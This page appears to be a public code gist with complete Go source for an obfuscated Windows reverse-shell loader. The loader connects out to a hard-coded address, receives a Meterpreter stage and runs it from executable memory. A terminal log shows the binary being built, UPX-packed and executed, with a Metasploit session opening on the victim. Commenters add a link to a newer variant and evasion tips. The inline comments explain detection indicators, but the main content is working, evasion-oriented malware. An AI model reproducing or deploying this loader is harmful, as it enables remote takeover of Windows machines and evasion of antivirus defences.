Golang Obfuscated x64 reverse shell --
package main | |
import ( | |
"encoding/binary" | |
"syscall" | |
"unsafe" | |
) | |
// Win32 memory flags passed to VirtualAlloc below. The identifiers are
// obfuscated but the values are the documented winnt.h constants.
const (
	lXMIZpS         = 0x1000 // MEM_COMMIT
	VcLxmtJ         = 0x2000 // MEM_RESERVE
	wayikvgQuwZOKRY = 0x40   // PAGE_EXECUTE_READWRITE: a single RWX region, a classic detection signal
)
// kernel32!VirtualAlloc resolved lazily by name on first Call rather than
// linked statically; the only API this program imports by hand.
var (
	TpsRJyKj = syscall.NewLazyDLL("kernel32.dll")
	HeBbAJo  = TpsRJyKj.NewProc("VirtualAlloc")
)
// ZOSUxNefsYMzpvV wraps VirtualAlloc(NULL, size, MEM_RESERVE|MEM_COMMIT,
// PAGE_EXECUTE_READWRITE): it asks the OS for a committed region of at least
// lLQsWhDNLkJ bytes that is both writable and executable, and returns its
// base address. A zero result from the API is treated as failure and the
// errno from the call is returned; on success the errno (always non-nil from
// LazyProc.Call, possibly zero) is discarded.
func ZOSUxNefsYMzpvV(lLQsWhDNLkJ uintptr) (uintptr, error) {
	RUguHNXDNuh, _, ZzdnsKGXsnEJSOb := HeBbAJo.Call(0, lLQsWhDNLkJ, VcLxmtJ|lXMIZpS, wayikvgQuwZOKRY)
	if RUguHNXDNuh == 0 {
		return 0, ZzdnsKGXsnEJSOb
	}
	return RUguHNXDNuh, nil
}
// main is a staged TCP loader: it connects out to a hard-coded address,
// reads a 4-byte little-endian length followed by that many bytes of stage,
// copies the stage into an RWX region behind a 5-byte stub, and transfers
// control to it. Every syscall result is discarded, so any failure is silent.
// The observable host indicators are the outbound TCP connection, the
// VirtualAlloc with PAGE_EXECUTE_READWRITE, and execution from that region.
func main() {
	// Only used as the fixed size of the array type that views the allocated
	// region (1000 KiB); the real allocation is stage length + 5 bytes.
	const pYlbbgvvOrhAHhS = 1000 << 10
	var SETPHNv syscall.WSAData
	// Winsock 2.2 initialisation; return value ignored.
	syscall.WSAStartup(uint32(0x202), &SETPHNv)
	// Blocking IPv4 TCP connect to 10.10.14.13:3434 (hard-coded in the binary).
	wyebwJYVHXfDdb, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)
	XNtaMXsXZ := syscall.SockaddrInet4{Port: 3434, Addr: [4]byte{10, 10, 14, 13}}
	syscall.Connect(wyebwJYVHXfDdb, &XNtaMXsXZ)
	// First message from the peer: 4-byte little-endian stage length.
	var bHGgnYW [4]byte
	VmUBlihof := syscall.WSABuf{Len: uint32(4), Buf: &bHGgnYW[0]}
	vaHYArAaywVWGg := uint32(0)  // WSARecv flags (in/out)
	jDPnsWnMeqyaLmb := uint32(0) // bytes received by the last WSARecv
	syscall.WSARecv(wyebwJYVHXfDdb, &VmUBlihof, 1, &jDPnsWnMeqyaLmb, &vaHYArAaywVWGg, nil, nil)
	mdIVYDZdxBXzau := binary.LittleEndian.Uint32(bHGgnYW[:])
	// Stage body: received into a scratch buffer of the announced size and
	// appended chunk by chunk to EtplhZEubJ until the byte count reaches the
	// announced length. The receive status is never inspected; only the
	// reported byte count drives the loop.
	HiPqRgExpeNf := make([]byte, mdIVYDZdxBXzau)
	var EtplhZEubJ []byte
	VmUBlihof = syscall.WSABuf{Len: mdIVYDZdxBXzau, Buf: &HiPqRgExpeNf[0]}
	vaHYArAaywVWGg = uint32(0)
	jDPnsWnMeqyaLmb = uint32(0)
	vwJWSE := uint32(0)
	for vwJWSE < mdIVYDZdxBXzau {
		syscall.WSARecv(wyebwJYVHXfDdb, &VmUBlihof, 1, &jDPnsWnMeqyaLmb, &vaHYArAaywVWGg, nil, nil)
		for i := 0; i < int(jDPnsWnMeqyaLmb); i++ {
			EtplhZEubJ = append(EtplhZEubJ, HiPqRgExpeNf[i])
		}
		vwJWSE += jDPnsWnMeqyaLmb
	}
	// RWX allocation sized for the stage plus the 5-byte prefix written next.
	dbosNYg, _ := ZOSUxNefsYMzpvV(uintptr(mdIVYDZdxBXzau + 5))
	// Reinterpret the raw address as a large byte array so it can be indexed;
	// Go's array bound (pYlbbgvvOrhAHhS) is the only limit on the writes below.
	jtXOajZJPxRjsU := (*[pYlbbgvvOrhAHhS]byte)(unsafe.Pointer(dbosNYg))
	// Numeric value of the socket handle.
	xERsTYZ := (uintptr)(unsafe.Pointer(wyebwJYVHXfDdb))
	// 5-byte prefix 0xBF imm32, i.e. x86 `mov edi, imm32`, carrying only the
	// low byte of the socket handle (the upper three bytes are written as
	// zero). Presumably this hands the open connection to the stage in EDI;
	// the transcript below shows it paired with a Metasploit multi/handler.
	jtXOajZJPxRjsU[0] = 0xBF
	jtXOajZJPxRjsU[1] = byte(xERsTYZ)
	jtXOajZJPxRjsU[2] = 0x00
	jtXOajZJPxRjsU[3] = 0x00
	jtXOajZJPxRjsU[4] = 0x00
	// Stage bytes follow the prefix.
	for jOxXGfFyginsO, zeNNNv := range EtplhZEubJ {
		jtXOajZJPxRjsU[jOxXGfFyginsO+5] = zeNNNv
	}
	// On Windows syscall.Syscall calls the function at the given address, so
	// this jumps into the freshly written RWX region; execution never returns
	// here in the normal case.
	syscall.Syscall(dbosNYg, 0, 0, 0, 0)
}
3:11:30 cdowns@7242-alpha-reticuli test GOOS=windows GOARCH=amd64 go build 3fb7Jq79.go 1 ↵ | |
3:11:40 cdowns@7242-alpha-reticuli test file 3fb7Jq79.exe | |
3fb7Jq79.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows | |
3:11:50 cdowns@7242-alpha-reticuli test ll 3fb7Jq79.exe | |
-rwxr-xr-x 1 cdowns cdowns 1.6M Mar 26 03:11 3fb7Jq79.exe* | |
3:12:00 cdowns@7242-alpha-reticuli test upx brute 3fb7Jq79.exe | |
Ultimate Packer for eXecutables | |
Copyright (C) 1996 - 2018 | |
UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018 | |
File size Ratio Format Name | |
-------------------- ------ ----------- ----------- | |
upx: brute: FileNotFoundException: brute: No such file or directory | |
1653760 -> 836608 50.59% win64/pe 3fb7Jq79.exe | |
Packed 1 file. | |
3:14:01 cdowns@7242-alpha-reticuli test ll 3fb7Jq79.exe 1 ↵ | |
-rwxr-xr-x 1 cdowns cdowns 817K Mar 26 03:11 3fb7Jq79.exe* | |
3:14:12 cdowns@7242-alpha-reticuli test | |
C:\Users\XXXXXX\Downloads>cmd /k 3fb7Jq79.exe | |
cmd /k 3fb7Jq79.exe | |
[*] Sending stage (206403 bytes) to 10.10.10.130 | |
[*] Meterpreter session 1 opened (10.10.14.13:3434 -> 10.10.10.130:49985) at 2019-03-26 03:22:03 +0000 | |
msf5 exploit(multi/handler) > sessions -l | |
Active sessions | |
=============== | |
Id Name Type Information Connection | |
-- ---- ---- ----------- ---------- | |
1 meterpreter x64/windows XXXXXX\Xxxxxxx @ XXXXXX 10.10.14.13:3434 -> 10.10.10.130:49985 (10.10.10.130) | |
msf5 exploit(multi/handler) > |
Ah word. It's pretty old now. Try --
https://github.com/cdowns71/stuffz/blob/master/codez/go/3L9TALcw.go
Is using obfuscated function names really useful? I think it's enough to use go build -ldflags '-s -w'...
?
Don't know if I'm high on drugs or worshiping Satan but the shell response time is impressive !!